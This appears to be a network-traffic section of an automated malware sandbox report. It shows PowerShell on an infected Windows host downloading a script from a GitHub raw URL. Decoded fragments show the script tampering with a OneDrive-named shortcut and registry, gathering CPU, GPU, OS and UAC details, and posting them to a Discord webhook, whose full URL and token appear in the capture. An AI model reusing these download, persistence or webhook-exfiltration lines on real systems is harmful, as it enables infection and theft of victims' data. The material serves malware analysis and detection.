                                                                2024-10-15 14:00:14 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:14 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.749768185.199.109.1334437352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:14 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:14 UTC901INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:14 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120024-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000814.165471,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: bb54fbb1b40dd0ad763e58ba4439a0d7957f87c4
                                                                Expires: Tue, 15 Oct 2024 14:05:14 GMT
                                                                Source-Age: 20
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:14 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.749771185.199.109.1334437172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:14 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:14 UTC901INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 14:00:14 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210106-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 1
                                                                X-Timer: S1729000814.172466,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: f14414e3b629e18799bb629f77a7364d76a80be0
                                                                Expires: Tue, 15 Oct 2024 14:05:14 GMT
                                                                Source-Age: 20
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 14:00:14 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 14:00:14 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.752050162.159.128.2334437352C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 14:00:28 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Content-Type: application/json
                                                                Host: discord.com
                                                                Content-Length: 302
                                                                Connection: Keep-Alive
                                                                2024-10-15 14:00:28 UTC302OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 41 47 31 31 41 50 36 36 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** AG11AP66\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
                                                                2024-10-15 14:00:28 UTC1261INHTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 14:00:28 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
